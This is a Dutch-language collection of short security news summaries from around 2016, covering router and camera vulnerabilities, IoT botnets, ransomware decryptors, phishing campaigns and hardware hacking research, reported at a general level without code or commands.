    De kwetsbaarheid is aanwezig in het SNH-1011-model, maar mogelijk ook in andere modellen. De onderzoekers schrijven dat het lek in php-code aanwezig is, waardoor een aanvaller door middel vancommand injection willekeurige code op de camera kan uitvoeren. Hierdoor kan hij het apparaat overnemen en bijvoorbeeld toegang verkrijgen tot de beelden die de camera opneemt. De kwetsbare code is verantwoordelijk voor het updaten van de firmware via de zogenaamde iWatch-dienst. Omdat er geen input sanitation plaatsvindt, kan een aanvaller zelf een bestandsnaam kiezen voor een updatebestand, die kwaadaardige commando's bevat. De webserver voert deze commando's vervolgens uit als root. De onderzoekers melden dat dit niet de eerste keer is dat deze cameralijn van Samsung kwetsbaar blijkt te zijn.

  • ipcam1Onderzoekers hebben in verschillende populaire ip-camera's van D-Link, Netgear en andere fabrikanten kwetsbaarheden gevonden. De test werd door het Duitse testlab AV-Test uitgevoerd. In totaal ging het om acht verschillende ip-camera's. Slechts drie camera's doorstonden de test.

    Bij twee camera's bleek het eenvoudig voor een aanvaller om met de beelden mee te kijken. Voor de test keken de onderzoekers naar lokale opslag, de externe app, beheer van de camera op afstand, versleutelde verbindingen en hoe de camerasoftware afbeeldingen en video's opsloeg. Netgear, MyFox en Logitech scoren op alle onderdelen een voldoende en behalen zo de maximale drie punten.

  • Beveiligingsbedrijf Wordfence maakt melding van een phishingcampagne, die zich al langere tijd richt op Gmail-gebruikers. Deze maakt gebruik van afbeeldingen die eruitzien als bijlagen om het slachtoffer naar een nagebouwde Google-loginpagina te sturen.

    Op die pagina, die er net als een daadwerkelijke Google-pagina uitziet, wordt slachtoffers gevraagd om hun logingegevens in te vullen, schrijft Wordfence. Nadat dit is gebeurd, verkrijgen degenen achter de phishingcampagne snel toegang tot het account, waardoor het lijkt dat dit geautomatiseerd gebeurt of dat er een team klaarstaat. Naast de snelheid waarmee het inloggen plaatsvindt, is de url van de loginpagina opvallend. Deze bevat de tekst accounts.google.com, waardoor het in een oogopslag kan lijken alsof men op de juiste pagina is.

  • hackerOpnieuw lijkt Oekraïne slachtoffer te zijn geworden van een hackaanval op het elektriciteitsnetwerk. Inbrekers zouden net als in 2015 de elektriciteit hebben uitgeschakeld, met als waarschijnlijke doel om hun inbreektechnieken te testen voor een 'echte' aanval.

    Vorige maand werd Oekraïne getroffen door een kortdurende stroomstoring die ongeveer een uur aanhield. Bronnen vertellen aan Motherboard dat het hier niet ging om een technische storing, maar om een aanval op het elektriciteitssysteem. Hackers zouden op een substation in Pivnichna nabij Kiev hebben ingebroken en de systemen offline hebben gehaald. Dat zouden zij hebben gedaan door zogenaamde remote-terminal units uit te zetten. De Oekraïense autoriteiten kondigden eerder al aan een onderzoek in te stellen naar de stroomstoring.

  • php mailerEen beveiligingsupdate die deze week verscheen voor een ernstig beveiligingslek in PHPMailer blijkt niet afdoende te zijn, waardoor nog steeds miljoenen websites risico lopen. PHPMailer is een programma dat e-mailfunctionaliteit aan websites toevoegt, bijvoorbeeld voor het achterlaten van feedback.

    Volgens de ontwikkelaars heeft de software naar schatting 9 miljoen gebruikers. Onder andere WordPress, Drupal, SugarCRM en Joomla maken er gebruik van, zo meldt het Nationaal Cyber Security Center (NCSC). Deze week verscheen er een beveiligingsupdate voor een kwetsbaarheid (CVE-2016-10033) waardoor een aanvaller op afstand code met de rechten van de webserver kon uitvoeren. De update, met versienummer 5.2.18, blijkt het probleem echter niet volledig te verhelpen, meldt beveiligingsonderzoeker Dawid Golunski. Hij ontdekte ook het lek en de mogelijkheid om de update te omzeilen.

  • Netgear WNR2000Netgear heeft beveiligingsupdates uitgebracht voor een ernstig beveiligingslek in 11 type routers dat op 9 december bekend werd gemaakt. Via de kwetsbaarheid kan een aanvaller op afstand de router overnemen als een gebruiker een kwaadaardige pagina opent.

    In eerste instantie werd gemeld dat het probleem alleen in de R7000- en R6400-routers aanwezig was. Later bleken veel meer modellen kwetsbaar te zijn. Inmiddels heeft Netgear ook een model van deze lijst verwijderd. Het gaat om de D7000. Netgear had eerst nog gezegd dat dit model wel kwetsbaar was, maar dat blijkt na testen toch niet zo te zijn. De afgelopen dagen verscheen voor alle elf kwetsbare routers al een betaversie van de firmware die het probleem oplost.

  • Netgear WNR2000Een beveiligingsonderzoeker heeft een ernstig beveiligingslek in de Netgear WNR2000-router onthuld waardoor aanvallers in het ergste geval het apparaat via het internet kunnen overnemen en een beveiligingsupdate is nog niet beschikbaar. De WNR2000-router werd ook in Nederland verkocht.

    Een kwetsbaarheid in de router maakt het mogelijk voor een aanvaller op het lokale netwerk (lan) om het beheerderswachtwoord te achterhalen. Ook is het mogelijk om op afstand allerlei instellingen aan te passen. Als 'beheer op afstand' is ingeschakeld is het ook mogelijk om de kwetsbaarheid via internet aan te vallen. Onderzoeker Pedro Ribeiro ontdekte via de zoekmachine Shodan 10.000 routers waar "remote administration" staat ingeschakeld.

  • ransomwareKaspersky Lab heeft een tool uitgebracht waarmee bestanden die vergrendeld zijn door ransomware CryptXXX v3 zijn te ontsleutelen. De geavanceerde ransomware werd sinds mei verspreid en tot dusver was er geen volledige decryptie mogelijk.

    Het beveiligingsbedrijf heeft de decryptiemethode toegevoegd aan zijn Rannoh Decryptor-software, die gebruikers kunnen downloaden op NoMoreRansom.org. Kaspersky Lab wist eerdere versies van CryptXXX ook al te kraken en bracht destijds vrij snel software uit waarmee gebruikers de ransomware te lijf konden te gaan.

  • dnschanger router malwareEen paar dagen geleden berichtten we over een nieuwe exploit kit, genaamd Stegano. Deze verstopt kwaadaardige code in de pixels van banner advertenties nieuwssites.
    Nu, hebben onderzoekers ontdekt dat aanvallers zich richten op online gebruikers via een exploit kit genaamd DNSChanger.Deze wordt verspreid via advertenties met kwaadaardige code in plaatjes.
    Als je DNSChanger bekend voorkomt klopt dat. Dezelfde malware heeft in 2012 miljoenen computers wereldwijd besmet.

  • yahoo hackDe database met daarin gegevens van meer dan een miljard accounts, die in 2013 werd buitgemaakt bij Yahoo, is volgens een beveiligingsexpert drie keer verkocht voor 300.000 dollar. Twee kopers zouden bekende spammers zijn en de derde is mogelijk een inlichtingendienst.

    Andrew Komarov, chief intelligence officier van het beveiligingsbedrijf InfoArmor, zegt in een interview met Bloomberg dat de accountdatabase op het dark web word verkocht door een groepering die hij Group E noemt. Komarov stelt dat hij de database in augustus in handen kreeg toen er een transactie plaatsvond. Volgens de beveiligingsexpert werd de database verkocht als een set van inloggegevens van 'meer dan vijfhonderd miljoen, tot een miljard gebruikers'.

  • netgear r7000

    Netgear heeft een tijdelijke patch uitgebracht voor routermodellen met een kwetsbaarheid die een aanvaller willekeurige code laat uitvoeren. Het bedrijf raadt gebruikers echter aan om te wachten op de stabiele versies van de patches.

    De tijdelijke bètapatches zijn beschikbaar voor de R6400-, R7000- en R8000-modellen, aldus Netgear. Het schrijft dat sommige stabiele patches in de loop van dinsdag moeten uitkomen. Die zullen aan de ondersteuningspagina toegevoegd worden. Daarnaast meldt het bedrijf dat het lek in totaal acht routermodellen treft, namelijk de R6250, R6700, R7100LG, R7300 en R7900 naast de al genoemde modellen. Netgear stelt dat de mogelijkheid bestaat dat meer routers getroffen zijn.

  • netgear r7000Het Amerikaanse Cert van de Carnegie Mellon-universiteit waarschuwt dat R7000- en R6400-routers van Netgear een ernstig beveiligingslek bevatten. Hierdoor kan een aanvaller op afstand willekeurige code als root uitvoeren.

    Volgens de organisatie is er inmiddels een exploit voor de kwetsbaarheid beschikbaar, waardoor gebruikers risico lopen. Het advies is dan ook om de routers niet te gebruiken tot er een patch beschikbaar is. Vooralsnog lijkt deze niet door Netgear uitgebracht te zijn. ZDNet schrijft dat een woordvoerder van het bedrijf nog niet op vragen heeft gereageerd. Het Amerikaanse Cert meldt verder dat het lek te misbruiken is door een slachtoffer een kwaadaardige site te laten bezoeken. Een aanval is ook via het lokale netwerk mogelijk.

  • stegano exploit kit malware hackingOnderzoekers van beveiligingsbedrijf ESET laten weten dat zij een exploitkit hebben ontdekt die zij de naam 'Stegano' hebben gegeven, omdat het maatregelen neemt om zichzelf te verbergen. Het verspreidt malware door pixels in advertentiebanners.

    De kwaadaardige advertenties zijn sinds oktober vooral aanwezig op nieuwswebsites, aldus de onderzoekers. Het gaat om banners voor de producten 'Broxu', een tool om schermafbeeldingen te maken, en 'Browser Defence', dat de browser van gebruikers moet beschermen. De exploitkit zou sinds 2014 al actief zijn. Destijds richtte deze zich voornamelijk op Nederlandse gebruikers. Daarna verlegden de criminelen erachter hun aandacht naar Tsjechië, gevolgd door bijvoorbeeld het VK, Spanje en Italië. De omvang van de exploitkit zou te vergelijken zijn met andere grote varianten, waaronder Angler en Neutrino. De banners zijn aanwezig op sites die door miljoenen gebruikers worden bezocht, aldus het bedrijf.

  • wifi symboolDe malware die onlangs nog voor problemen bij Deutsche Telekom en verschillende Britse internetproviders zorgde blijkt routers niet alleen te infecteren, maar ook het wifi-wachtwoord te stelen. Dat meldt Andrew Tierney van het Britse beveiligingsbedrijf Pen Test Partners in een blogposting.

    De malware gebruikt de TR-064- en TR-069-configuratieprotocollen over poort 7547 om toegang tot de routers te krijgen. Vervolgens wordt de malware geladen die de besmette router naar andere kwetsbare routers laat zoeken. Pen Test Partners heeft een honeypot draaien en zag onlangs een aanval waarbij werd geprobeerd om niet alleen het apparaat te besmetten, maar ook het wifi-wachtwoord te stelen.

  • torMozilla werkt aan een update om een beveiligingsgat te dichten dat gebruikers van de Tor-browser zou kunnen ontmaskeren. De Tor-browser draait op een aangepaste versie van Firefox. De javascript-exploit zou in staat zijn om mac-adressen, hostnamen en ip-adressen te ontfutselen.

    Volgens een anonieme mededeling op de Tor-community wordt de javascript-exploit nu publiekelijk ingezet om gebruikers van de Tor-browser te ontmaskeren. "De werking is niet helemaal duidelijk, maar het krijgt toegang tot VirtualAlloc in kernel32.dll en gaat vanaf daar verder", stelt hij of zij. Het enige dat een slachtoffer hoeft te doen om getroffen te worden, is een geïnfecteerde webpagina bezoeken.

  • headphone spying malwareOnderzoekers van de Israëlische Ben-Gurion Universiteit hebben software ontwikkeld, waarmee zij in computers met Realtek-audiochips de uitvoerpoort als invoerpoort kunnen laten werken. Op die manier kunnen zij geluid opvangen met aangesloten koptelefoons.

    In hun onderzoek vermelden zij dat het al lang bekend is dat speakers als microfoon kunnen fungeren, doordat zij geluidsgolven omzetten in elektrische signalen. Dit alleen levert volgens de onderzoekers geen beveiligingsrisico op, omdat er doorgaans geen speaker aan een microfooningang wordt aangesloten. Om hun software, genaamd 'Speake(a)r', te laten werken, maken de onderzoekers gebruik van een functie die deel uitmaakt van de Intel HD Audio-specificatie. Die maakt het mogelijk om via software een nieuwe functie toe te wijzen aan een audioaansluiting van een pc, bijvoorbeeld van uitvoer naar invoer. Zij demonstreren dit aan de hand van Realtek-audiochips.

  • Netis logoNog altijd 13.000 routers van de Chinese fabrikant Netcore zijn via een twee jaar oude backdoor op internet benaderbaar. De routers, die buiten China onder de naam Netis worden aangeboden, hebben een udp-poort die op poort 53413 luistert en toegankelijk vanaf de wan-kant van de router is.

    Dit houdt in dat als de router in kwestie een ip-adres heeft dat van buiten toegankelijk is, wat bij de meeste gebruikers het geval zal zijn, een aanvaller van over het internet de backdoor kan benaderen. De backdoor wordt beveiligd via een "hardcoded" wachtwoord dat in de firmware van de routers is te vinden.

  • De bekende hacker Samy Kamkar heeft een nieuwe hacktool ontwikkeld waarmee het mogelijk is om http-cookies van een vergrendelde computer te stelen.Kamkar noemt zijn nieuwste creatie PoisonTap. Het is een Raspberry Pi Zero die een usb-ethernet-apparaat emuleert.

  • In dit artikel wordt het opzetten van een Reverse Shell payload op een USB Rubber Ducky besproken. 

    Een omgekeerde shell is een shell type, waarbij de geinfecteerde computer 'inbelt' naar de computer van een aanvaller. Hierbij luistert de aanvallende computer meestal op een specifieke poort. Wanneer de verbinding tot stand komt, is de aanvallende computer in staat om commando's op de computer van het slachtoffer uit te voeren. 

  • redalert2 VREen ontwikkelaar heeft een vr-versie van Command & Conquer: Red Alert 2 gemaakt. Het betreft een proof-of-concept waarbij de van oorsprong isometrisch gerenderde game met behulp van Unreal Engine 4 in 3d is nagemaakt.

    Ádám Horváth toont op YouTube hoe hij een level in de game speelt. Hij bestuurt het spel met de controllers van de HTC Vive, waarvan degene in zijn linkerhand in het spel wordt weergegeven als een tablet, waarop alle commando's en interface-elementen te vinden zijn.

  • ErasmusCriminelen hebben mogelijk adresgegevens van mogelijk 25.000 medewerkers en studenten van de Erasmus Universiteit in Rotterdam buitgemaakt. Ook informatie die mensen via webformulieren achterlieten is misschien in handen van de hackers.

    De universiteit constateerde de hack afgelopen zondag. Op de server waar de hackers via de site toegang toe kregen stonden geen wachtwoorden van medewerkers en studenten, alleen adresgegevens, meldt de woordvoerster van de universiteit tegen Tweakers. Via de webformulieren konden medewerkers en studenten bijvoorbeeld afspraken maken en zich op opleidingen en cursussen inschrijven. Ook die informatie is mogelijk ingezien. Onduidelijk is nog of de data daadwerkelijk weggesluisd is. Het onderzoek loopt nog.

  • dlink logoEigenaren van verschillende D-Link-routers zijn gewaarschuwd voor een ernstig beveiligingslek waardoor een aanvaller op afstand met rootrechten willekeurige code kan uitvoeren, zoals het installeren van malware. Een beveiligingsupdate om het probleem te verhelpen is nog niet voorhanden.

    Volgens het CERT Coordination Center (CERT/CC) van de Carnegie Mellon Universiteit gaat het om een buffer-overflow bij het verwerken van speciaal geprepareerde soap-berichten tijdens het inloggen op de router. Een aanvaller kan hier op afstand en zonder geldige inloggegevens misbruik van maken. De kwetsbaarheid is aanwezig in D-Link DIR-routers met modelnummer: 818L(W), 822, 823, 868L, 880L, 885L, 890L en 895L.

  • openssl logoHet OpenSSL Project Team heeft een belangrijke beveiligingsupdate voor OpenSSL aangekondigd die donderdag 10 november zal verschijnen en meerdere beveiligingslekken verhelpt. De beveiligingslekken bevinden zich in versie 1.1.0. Minstens één van de kwetsbaarheden is als "high" geclassificeerd.

    OpenSSL laat niet weten wat aanvallers in dit geval kunnen doen, maar stelt dat voor kwetsbaarheden met deze classificatie er altijd een nieuwe versie wordt uitgebracht. OpenSSL-versies voor 1.1.0 zijn niet kwetsbaar. De update naar OpensSSL 1.1.0c zal donderdag 10 november tussen 13:00 uur en 17:00 uur verschijnen. OpenSSL is één van de meest gebruikte software voor het versleutelen van internetverbindingen, bijvoorbeeld tussen websites en hun bezoekers.

    Bron: Security.nl

  • Onderzoekers hebben als proof-of-concept een worm ontwikkeld die zich van lamp naar lamp verspreidde. Ze demonstreerden een aanval met wardriving en warflying met een quadcopter om Philips Hue-lampen op grote afstand te infecteren.

    De onderzoekers van het Weizmann Institute of Science installeerden voor hun demonstratie drie Philips Hue-lampen op de eerste verdieping van hun faculteit, waarna ze deze vanaf zeventig meter afstand vanuit hun auto konden infecteren. Daarnaast gebruikten ze een DJI Inspire-quadcopter om vijf lampen op de derde verdieping van een gebouw de Morse-code voor sos te laten flikkeren. Ze starten hun aanval vanaf 350 meter om de fabrieksinstellingen bij de lampen te forceren, de volledige aanval lukte van kortere afstand.

  • joomla logoHet Nationaal Cyber Security Centrum (NCSC) van de overheid heeft een waarschuwing afgegeven voor twee ernstige beveiligingslekken in het populaire contentmanagementsysteem (cms) Joomla waardoor aanvallers websites kunnen overnemen.

    Het is de eerste keer dat het NCSC via een dergelijke gerichte waarschuwing aandacht voor Joomla-lekken vraagt. De organisatie publiceert regelmatig beveiligingsadviezen waarin op allerlei kwetsbaarheden wordt gewezen, waaronder ook in Joomla. Nu wordt er echter via een apart nieuwsbericht voor de Joomla-lekken gewaarschuwd. Volgens het NCSC worden kwetsbaarheden in Joomla en andere contentmanagementsystemen regelmatig misbruikt en ingezet voor misdrijven en aanvallen.

  • wordpress securityEen beveiligingslek in een plug-in voor WordPress waarvoor nog geen beveiligingsupdate beschikbaar is wordt actief gebruikt om websites te hacken en van een backdoor te voorzien. Daarvoor waarschuwt beveiligingsbedrijf Sucuri. De kwetsbaarheid bevindt zich in de Marketplace-plug-in.

    Deze plug-in fungeert naar eigen zeggen als "volwaardige ecommerce-oplossing" voor WordPress-sites en maakt het mogelijk om een website zonder al teveel kennis in een webwinkel te veranderen. Het beveiligingslek in de plug-in maakt het mogelijk voor een aanvaller om willekeurige bestanden te uploaden. In de nu waargenomen aanvallen gaat het om een backdoor die aanvallers volledige controle over het systeem geeft.

  • chrome logo1ChromeOS wordt als één van de veiligere besturingssystemen gezien, maar onlangs werd er een kwetsbaarheid in gerapporteerd waardoor een aanvaller op afstand code met rootrechten kon uitvoeren. Het door Google ontwikkelde besturingssysteem draait op Chromebooks, die erg populair in de VS zijn.

    ChromeOS maakt onder andere gebruik van het c-ares project. Dit is een softwarebibliotheek voor asynchrone dns-verzoeken. Een kwetsbaarheid hierin bleek het mogelijk te maken voor een aanvaller om via JavaScript code met rootrechten uit te voeren. Het bezoeken van een gehackte of kwaadaardige website zou in dit geval voldoende zijn geweest. "Ik vermoed dat dit de ergste exploit is die voor ChromeOS gemaakt kan worden", zegt Daniel Stenberg, ontwikkelaar bij Mozilla en één van de beheerders van het c-ares project.

  • amd freesyncEen gebruiker op Reddit toont dat hij en enkele andere ontwikkelaars software hebben ontwikkeld waarmee FreeSync gebruikt kan worden op monitoren die het officieel niet ondersteunen. De hack werkt niet op alle monitoren en alleen via hdmi en in sommige gevallen dvi. De ontwikkelaar schrijft op Reddit dat gebruikers van de hack moeten beschikken over een gpu die FreeSync ondersteunt en voorzien is van de meest recente Crimson-driver. Het bericht is voorzien van een link naar een bericht op het Guru3D-forum, waar de software gedownload kan worden. In hetzelfde bericht wordt uitgebreid uitgelegd hoe de gebruiker de software kan laten werken.

  • Drie beveiligingsonderzoekers van Kaspersky Labs zijn erin geslaagd om de versleuteling te breken van de Polyglot-cryptoware. Het opmerkelijke aan Polyglot, ook wel bekend als Marsjoke, is dat de malware erg veel lijkt op de CTB-Locker die eerder dit jaar veel slachtoffers heeft gemaakt.

    Het grootste verschil tussen Polyglot en CTB-Locker is de zwakke key generator. De onderzoekers hebben aan de hand van analyses namelijk ontdekt dat de sleutels die Polyglot genereert helemaal niet willekeurig zijn. Door inzicht te verkrijgen in hoe de AES-encryptie sleutels werden gevormd waren ze in staat om de encryptie van Polyglot met een normale pc vrij snel te breken.

  • DOS attackDe broncode achter de software die onlangs verantwoordelijk was voor een van de grootste DDoS-aanvallen in de geschiedenis, is online verschenen. Daardoor kunnen zulke aanvallen in de toekomst mogelijk door meer hackers worden gelanceerd.

    De website van cybersecurityjournalist Brian Krebs werd vorige maand getroffen door een gigantische DDoS-aanval, waarbij zijn servers worden overspoeld door verkeer en daardoor overbelast raken.

    De aanval had een kracht van ruim 600 Gbps, een tot voor kort ondenkbaar hoge datadoorvoer voor een DDoS.

    Vermoedelijk werd voor de aanval een 'botnet' van onveilige routers, beveiligingscamera's en harddiskrecorders gebruikt. Krebs wees na de aanval op de gevaren van een slecht beveiligd 'internet of things' dat kan worden gebruikt om aanvallen uit te voeren.

  • dlink logoDat de beveiliging van routers ernstig te wensen overlaat blijkt uit onderzoek van Pierre Kim, die in de D-Link DWR-932B-router zo'n 20 kwetsbaarheden vond, waaronder een backdoor, backdoor-accounts en andere problemen. Hoewel D-Link al maanden geleden werd gewaarschuwd is er nog altijd geen update.

    Via de kwetsbaarheden kunnen aanvallers het apparaat volledig overnemen en het verkeer van gebruikers onderscheppen en manipuleren. De eerste problemen die Kim ontdekte betreffen twee backdoor-accounts waarmee er toegang tot de router kan worden verkregen. De accounts maken van standaardwachtwoorden gebruik en één van de accounts staat niet eens vermeld. Verder blijkt de router over een andere backdoor te beschikken. Door het versturen van udp-pakketten wordt er een telnet-server gestart die geen wachtwoord vraagt. Zodra de aanvaller hierop is ingelogd heeft hij rootrechten.

  • sslOpenSSL heeft een patch uitgebracht voor een kritiek lek dat er mogelijk voor kan zorgen dat een aanvaller op afstand code kan uitvoeren. De kwetsbaarheid werd volgens het OpenSSL-team geïntroduceerd door een recente patch.

    OpenSSL heeft maandag in een security advisory laten weten dat de kwetsbaarheid alleen voorkomt in versie 1.1.0a van de software. Daarom zouden gebruikers die de update nog niet hebben uitgevoerd meteen van versie 1.1.0 naar 1.1.0b moeten updaten. Het lek, met kenmerk cve-2016-6309, treedt op doordat de software een buffer verplaatst als er een bericht van meer dan 16k wordt ontvangen. In de vrijgemaakte ruimte zou vervolgens een aanvaller met een achtergebleven pointer kunnen schrijven. Dit zou kunnen leiden tot het uitvoeren van willekeurige code.

  • ios jailbreakLuca Todesco, ook wel bekend onder de online-naam qwertyoruiop, claimt dat hij een werkende jailbreak heeft ontwikkeld voor de iPhone 7. Het zou de eerste jailbreak zijn die op definitieve versie van iOS 10.0.1 draait. De jailbreak-tool is nog niet voor anderen beschikbaar.

    Todesco, die al eerdere versies van iOS heeft gejailbreakt, heeft via Twitter bekendgemaakt dat hij zijn iPhone 7 binnen een dag heeft kunnen jailbreaken. Hij toonde een foto en een video van een iPhone 7 die Cydia draait, een populaire alternatieve downloadwinkel voor gejailbreakte iOS-toestellen. De iPhone 7 is nu een week op de markt en de definitieve versie van iOS 10 is drie dagen langer publiekelijk beschikbaar.

  • tesla logoOnderzoekers van het Chinese beveiligingsbedrijf Keen Security Lab zijn erin geslaagd een Tesla Model S op afstand via een kwaadaardig wifi-netwerk te hacken. In een demonstratie laten de onderzoekers zien hoe ze op afstand het dak, de lichten, ruitenwissers, stoel, deuren, kofferbak en remmen bedienen.

    Tesla laat in een reactie tegenover de Verge weten dat het probleem alleen wordt veroorzaakt als de browser wordt gebruikt. Daarnaast moet de auto met een kwaadaardig wifi-netwerk in de buurt zijn verbonden. Volgens de autofabrikant was het risico voor klanten dan ook vrij klein.

  • mysqlBeveiligingsonderzoeker Dawid Golunksi heeft een kwetsbaarheid in MySQL, MariaDB en PerconaDB gevonden die het op afstand uitvoeren van code mogelijk maakt als de aanvaller al toegang heeft tot de database. Het lek is onder andere aanwezig in de laatste versie van MySQL.

    Voor de clones MariaDB en PerconaDB zijn eind augustus patches beschikbaar gekomen, zo schrijft de onderzoeker. Het beveiligingsprobleem met kenmerk cve-2016-6662 is onderdeel van meerdere kwetsbaarheden, voegt Golunksi daaraan toe. Het lek heeft gevolgen voor alle MySQL-servers in standaardconfiguratie, van de vroegste tot de huidige versies in verschillende branches, namelijk 5.7.15, 5.6.33 en 5.5.52.

  • androidDe beveiligingsupdates die Google deze week voor Android uitrolde blijken ook een ernstig lek te verhelpen waardoor het mogelijk is om via een kwaadaardig jpeg-plaatje toestellen aan te vallen. Een aanvaller hoeft de afbeelding alleen naar een slachtoffer te versturen, verdere interactie is niet vereist.

    Het probleem wordt veroorzaakt door een softwarebibliotheek die Exif-data van jpeg-afbeeldingen probeert uit te lezen. Exif is de standaard voor het opslaan van metadata in foto's. De kwetsbaarheid werd door onderzoeker Tim Strazzere van beveiligingsbedrijf SentinelOne ontdekt. De onderzoeker testte zijn aanval met Gmail en Gchat, maar ook andere apps die de kwetsbare bibliotheek aanroepen lopen risico.

  • usb ethernetadapter

    Beveiligingsonderzoeker Rob Fuller heeft in een blogpost beschreven hoe hij via een aangepaste usb-ethernetadapter de inloggegevens van een ingelogde gebruiker steelt, terwijl het lockscreen wordt getoond. Dit zou werken op Windows- en OS X-computers.

    Fuller, ook bekend als 'Mubix', legt uit dat hij voor de aanval zowel een USB Armory als een LAN Turtle kon gebruiken. Op deze van een soc voorziene usb-apparaten kan verschillende software geïnstalleerd worden, bijvoorbeeld voor doeleinden als penetration testing.

  • malware3Onderzoekers van de Ben-Gurion Universiteit in Israël hebben een manier gedemonstreerd waardoor malware gevoelige gegevens van een niet met internet verbonden computer via de elektromagnetische straling van een usb-stick of ander usb-apparaat kan stelen.

    Vanwege het risico op aanvallen is het een veel gegeven advies om computers met vertrouwelijke data niet op internet aan te sluiten. Een offline computer kan echter nog steeds worden geïnfecteerd, bijvoorbeeld via usb-sticks of een kwaadwillende werknemer. Om vervolgens van een besmette offline computer toch data te kunnen stelen ontwikkelden onderzoekers de afgelopen tijd verschillende methodes, zoals het gebruik van speakersharde schijfventilatorenafgegeven warmte en mobiele telefoons om de gegevens direct naar de aanvaller of een wel met internet verbonden besmette computer of smartphone in de buurt terug te sturen.

  • malware3Onderzoekers hebben malware ontdekt die meer dan 1 miljoen Internet of Things-apparaten heeft geïnfecteerd, zoals digitale videorecorders en ip-camera's, en gebruikt voor het uitvoeren van ddos-aanvallen tegen websites. De malware heeft verschillende namen, zoals Lizkebab, BASHLITE, Torlus en gafgyt.

    Om kwetsbare apparaten te vinden worden er vanaf geïnfecteerde apparaten poortscans uitgevoerd. Zo wordt er naar Telnet-servers gezocht die op de apparaten actief zijn, om vervolgens via een brute force-aanval hier op in te loggen. De groep achter de malware maakt ook van externe scanners gebruik om kwetsbare apparaten te vinden. Bij deze methode proberen de aanvallers ook via kwetsbaarheden in de apparatuur en ssh op de toestellen in te loggen.

  • mozillaOpensource-ontwikkelaar Mozilla heeft een gratis tool ontwikkeld waarmee kan worden gecontroleerd hoe websites ssl/tls hebben geïmplementeerd. Observatory, zoals Mozilla de tool noemt, is vergelijkbaar met SSL Labs, de scandienst van beveiligingsbedrijf Qualys.

    De tool van Mozilla richt zich echter meer op doorsnee gebruikers, zegt Mozilla-ontwikkelaar April King. Zodra gebruikers een website op observatory.mozilla.org hebben ingevoerd wordt de opgegeven website gescand en verschijnt er vervolgens een rapport met een cijfer.

  • cerber ransomewareBeveiligingsbedrijf Check Point heeft een decryptietool voor de Cerber-ransomware beschikbaar gesteld. Hiermee kunnen slachtoffers van versie 1 en 2 van de malware gratis de versleuteling van hun bestanden ongedaan maken.

    Check Point laat weten dat het een uitgebreid onderzoek heeft uitgevoerd naar de Cerber-ransomware en dat het naar aanleiding daarvan in staat was om een decryptietool te ontwikkelen. Deze is beschikbaar op een speciale site en vereist dat slachtoffers een door Cerber versleuteld bestand uploaden. Daarna wordt een decryptiesleutel aangemaakt, die samen met de tool in dezelfde folder moet worden opgeslagen. Vervolgens kan de tool met beheerdersrechten uitgevoerd worden om de getroffen bestanden weer beschikbaar te maken.

  • Samsung SNH 6410BNOnderzoekers hebben in een ip-camera van de Zuid-Koreaanse elektronicafabrikant Samsung tal van beveiligingsproblemen gevonden waardoor een aanvaller in het ergste geval op afstand een apparaat volledig kan overnemen. Het gaat om de Samsung SNH-6410BN.

    Het apparaat wordt als babycamera, binnencamera en beveiligingscamera gebruikt. "De beeldkwaliteit is redelijk, maar zoals de norm is met ip-camera's schiet de netwerkbeveiliging te kort", aldus het Britse beveiligingsbedrijf Pen Test Partners. Onderzoekers ontdekten in totaal 10 beveiligingsproblemen.

  • volkswagen logo

    Onderzoekers van de Britse universiteit van Birmingham en het Duitse bedrijf Kasper & Oswald hebben twee lekken ontdekt in sleutelloze toegangssystemen van auto's, waaronder vooral Volkswagens. Door één lek kan toegang verkregen worden tot ongeveer 100 miljoen auto's.

    Het eerste lek zou ongeveer elke Volkswagen treffen die sinds 1995 is verkocht, evenals modellen van Audi en Škoda. Het tweede lek is aanwezig in andere merken, waaronder Fiat, Ford, Nissan, Opel en Peugeot. De eerste kwetsbaarheid is de meest verontrustende, schrijft Wired.

  • usb2Tijdens de Black Hat-conferentie in Las Vegas heeft een beveiligingsonderzoeker het risico gedemonstreerd van het aansluiten van onbekende usb-sticks waarmee de computer kan worden gehackt. In april van dit jaar verscheen er onderzoek naar het aansluiten van onbekende usb-sticks.

    Voor het onderzoek gebruikten onderzoekers van Google, de Universiteit van Illinois en de Universiteit van Michigan 297 usb-sticks die op verschillende plekken en tijdstippen op een universiteitscampus werden achtergelaten. De aanval zou een succespercentage van 45% tot 98% hebben, waarbij de eerste usb-stick in minder dan zes minuten nadat die was achtergelaten werd aangesloten.

  • IE and EdgeEen beveiligingsprobleem in Windows maakt het voor aanvallers mogelijk om inloggegevens te achterhalen, wat vooral een probleem is als gebruikers met hun Microsoft-account inloggen, zo waarschuwen een Russische beveilingsonderzoeker en vpn-aanbieder Perfect Privacy.

    Om het datalek te veroorzaken hoeft een aanvaller alleen een netwerk share aan te maken en het slachtoffer het ip-adres van deze share te laten bezoeken. Dit kan worden gedaan door een afbeelding op een website te embedden. Om de aanval te laten slagen is het wel vereist dat het slachtoffer Internet Explorer of Edge gebruikt. In het geval van Chrome of Firefox zal de aanval niet werken. Een andere aanvalsvector is het embedded van de netwerk share in een e-mail. Als het slachtoffer Microsoft Outlook gebruikt zal ook dit zijn inloggegevens lekken.

  • HTTPSVolgens Belgische beveiligingsonderzoekers bevat https een lek dat het mogelijk maakt om met een javascript persoonlijke gegevens te achterhalen. Het script zou in een advertentie verwerkt kunnen worden. De onderzoekers presenteren hun bevindingen op Black Hat.

    Voor de aanval is geen man-in-the-middle-positie nodig. Kwaadwillenden kunnen volgens onderzoekers Tom Van Goethem en Mathy Vanhoef van KU Leuven simpelweg een advertentie plaatsen met daarin een kwaadaardig javascript. De code kan vervolgens op de beveiligde pagina's exact meten hoe groot de versleutelde data is die wordt verstuurd.

    Met de hulp van twee andere exploits, bekend als Breach en Crime, is het mogelijk om aan de hand van de grootte sommige data te ontsleutelen. Dat is mogelijk door kwetsbaarheden die zitten in de manier waarop websites data comprimeren om ze sneller te laten laden.

  • hack droneHackers hebben een drone gemaakt die al vliegend beveiligingsonderzoek en penetratietests kan uitvoeren en ze zijn van plan om de blauwdruk openbaar te maken. De "Danger Drone", zoals de drone heet, is ontwikkeld door beveiligingsbedrijf Bishop Fox en is in feite een vliegende hack-laptop.

